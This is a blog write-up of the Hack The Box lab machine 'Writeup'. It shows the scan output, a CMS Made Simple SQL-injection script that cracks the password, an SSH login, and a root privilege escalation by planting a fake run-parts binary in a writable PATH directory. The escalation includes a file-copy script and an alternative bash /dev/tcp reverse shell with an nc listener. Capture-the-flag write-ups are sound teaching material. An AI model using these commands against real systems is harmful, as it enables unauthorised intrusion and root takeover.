Hackthebox – Write-up

As with any box, this box also started with the default sequence of Full Port scans on TCP (all ports), UDP (top-20) and a TCP -A scan.

root@kalivm:~/WriteUp# nmap -A -oN fullscan-A 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-02 18:41 CEST
Nmap scan report for
Host is up (0.016s latency).
Not shown: 998 filtered ports
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
1   16.03 ms
2   16.06 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 26 12:53:01 2019 -- 1 IP address (1 host up) scanned in 26.72 seconds

Nothing particularly interesting, so I started browsing the web server and found a robots.txt file containing a reference to a /writeup directory, refering to a blog.

#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `---''---`

# Disallow access to the blog until content is finished.
User-agent: * 
Disallow: /writeup/

Analysis of the blog shows that the blogging software CMS Made Simple is used.
Source of Writeup mainpage showing CMS Made Simple
Research shows several vulnerabilities including a SQL Injection vulnerability with a ready-made exploitation script. When running the script, it shows a hollywood-like password cracking attempt with both the username and the password as a result

root@kalivm:~/WriteUp# ./cmsms.py -u http://writeup.htb/writeup -w /usr/share/wordlists/rockyou.txt -c

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9

root@kalivm:~/WriteUp# ssh jkr@writeup.htb
jkr@writeup.htb's password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug  2 12:56:35 2019 from
jkr@writeup:~$ cat user.txt

Privilege escalation

After some initial enumeration, There was writable directory that I thought was remarkable but did not have any good use for yet.

jkr@writeup:~$ find / -writable -type d 2>/dev/null

Other than that, no specific items stood out and it became time to start analyzing running processes. Since ps aux only shows currently running processes, using pspy would be very useful to watch spawned processes in real-time. This resulted within a short time in something that really stood out.

jkr@writeup:/tmp/sed$ wget
--2019-08-02 13:10:12--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 4468984 (4.3M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64               100%[===============================>]   4.26M  5.66MB/s    in 0.8s

2019-08-02 13:10:12 (5.66 MB/s) - ‘pspy64’ saved [4468984/4468984]

jkr@writeup:/tmp/sed$ chmod +x pspy64 
jkr@writeup:/tmp/sed$ ./pspy64 
2019/08/02 13:11:29 CMD: UID=0    PID=6594   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 

Now this is where things get interesting. The path is being set to first include /usr/local/sbin (which I found out earlier, is writable), and the run-parts binary is not sufficiently secured by a full-path entry. This allowed me to create a short script that copy/pastes the root.txt to /tmp and change permissions so I can read it.

jkr@writeup:/tmp$ mkdir sed
jkr@writeup:/tmp$ cd sed
jkr@writeup:/tmp/sed$ nano rp
#!/usr/bin/env bash
cp /root/root.txt /tmp/sed/sed.txt
chmod 777 /tmp/sed/sed.txt
jkr@writeup:/tmp/sed$ chmod +x rp

Copy the created script to the /usr/local/sbin called run-parts and have and then wait until someone logs in again, triggering the script.

jkr@writeup:/tmp/sed$ mv rp /usr/local/sbin/run-parts
jkr@writeup:/tmp/sed$ ls
jkr@writeup:/tmp/sed$ cat sed.txt 

Alternative Privilege Escalation

As an alternative, I could also have added a reverse shell to my own machine

jkr@writeup:/tmp/sed$ nano rp
bash -i >& /dev/tcp/ 0>&1
jkr@writeup:/tmp/sed$ chmod +x rp
jkr@writeup:/tmp/sed$ cp rp /usr/local/sbin/run-parts

Copy the script and wait until someone logs in while having a listener on my own system

root@kalivm:~/WriteUp# nc -nlvp 9996
Listening on [] (family 2, port 9996)
Connection from 54582 received!
bash: cannot set terminal process group (2099): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# cat /root/root.txt

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.